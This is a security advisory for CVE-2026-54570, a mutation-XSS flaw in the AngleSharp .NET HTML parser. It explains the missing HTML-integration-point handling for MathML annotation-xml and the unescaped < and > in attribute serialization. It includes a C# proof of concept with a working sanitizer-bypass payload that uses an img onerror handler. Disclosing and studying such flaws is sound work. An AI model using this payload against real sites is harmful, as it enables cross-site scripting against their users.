PT-2026-60902 · Nuget · Anglesharp
CVE-2026-54570
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Publicado
2026-07-17
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Atualizado
2026-07-17
CVSS v3.1
6.9
Média
| Vetor | AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N |
Summary
The HTML specification requires that a MathML
<annotation-xml> element with encoding="text/html" or encoding="application/xhtml+xml" is treated as an HTML integration point. Content inside it must be parsed as HTML, not MathML.AngleSharp does not implement this correctly. As a result, the parser produces a DOM tree that differs from what a browser will build (different namespaces if
encoding="text/html" is not treated) when given the same serialized output. Two bugs combine to make this exploitable:- Missing HtmlTip flag: MathAnnotationXmlElement is never assigned NodeFlags.HtmlTip based on its encoding attribute, so the Consume() dispatch always routes tokens to Foreign() instead of Home() (HTML mode).
- Unescaped < > in attribute values: HtmlMarkupFormatter.WriteAttributeValue() does not escape < or > characters, only & and ". This allows injected markup to break out of attribute values on re-parse. See Escape "<" and ">" in attributes when serializing HTML #6235
Details
In
MathAnnotationXmlElement (AngleSharp/Mathml/Dom/Internal/MathAnnotationXmlElement.cs):cs
// Current — HtmlTip is never set
: base(owner, TagNames.AnnotationXml, prefix, NodeFlags.Special | NodeFlags.Scoped)Because
HtmlTip is absent, the token dispatch in Consume() always sends tokens to Foreign() when inside annotation-xml, regardless of the encoding attribute. The compensating check in ForeignNormalTag() only covers tags in AllForeignExceptions and is entirely bypassed during fragment parsing (innerHTML setter) due to an if (!IsFragmentCase) guard.In
HtmlMarkupFormatter.WriteAttributeValue() (AngleSharp/Html/HtmlMarkupFormatter.cs):cs
// Escapes & " and u00A0, but NOT < or >
case Symbols.Ampersand: stringBuilder.Append("&"); break;
case Symbols.NoBreakSpace: stringBuilder.Append(" "); break;
case Symbols.DoubleQuote: stringBuilder.Append("""); break;
default: stringBuilder.Append(value[i]); break; // < and > pass through rawPoC
The following program demonstrates that AngleSharp’s parser misses the injected
<img> element. A sanitizer walking this DOM would see nothing dangerous, yet the serialized output re-parses in a browser as a live <img onerror> trigger.cs
using System;
using System.Linq;
using AngleSharp.Html.Parser;
public class Program
{
static readonly string Payload1 =
"<math>" +
"<annotation-xml encoding="text/html">" +
"<title><a encoding="</title><img src=x onerror=alert()>">" +
"</annotation-xml></math>";
public static void Main()
{
var parser = new HtmlParser();
Check(parser, Payload1, "IMG",
"AngleSharp missed <img> – VULNERABLE (mXSS via attribute serialization)",
"AngleSharp found <img> – SAFE");
}
static void Check(HtmlParser parser, string html, string tag,
string failMsg, string passMsg)
{
var doc = parser.ParseDocument(html);
var tags = doc.All.Select(e => e.TagName).ToHashSet();
var found = tags.Contains(tag);
Console.WriteLine(found ? passMsg : failMsg);
Console.WriteLine("Serialized output:");
Console.WriteLine(doc.DocumentElement.OuterHtml);
}
}Output:
AngleSharp missed <img> – VULNERABLE (mXSS via attribute serialization)
Serialized output:
<html><head></head><body><math><annotation-xml encoding="text/html"><title><a encoding="</title><img src=x onerror=alert()>"></a></title></annotation-xml></math></body></html>The
title tag may be swapped out for style and other RCDATA elements.When a browser receives this string and parses
annotation-xml encoding="text/html" as an HTML integration point, the </title> closes the title element and the <img> fires its onerror handler.Impact
Implemented HTML sanitizers that depend and trust AngleSharp's ability to parse HTML correctly may be bypassable, as AngleSharp fails to acknowledge certain vectors under certain conditions.
This reduces AngleSharp's credibility as a conformant HTML parser.
Correção
XSS
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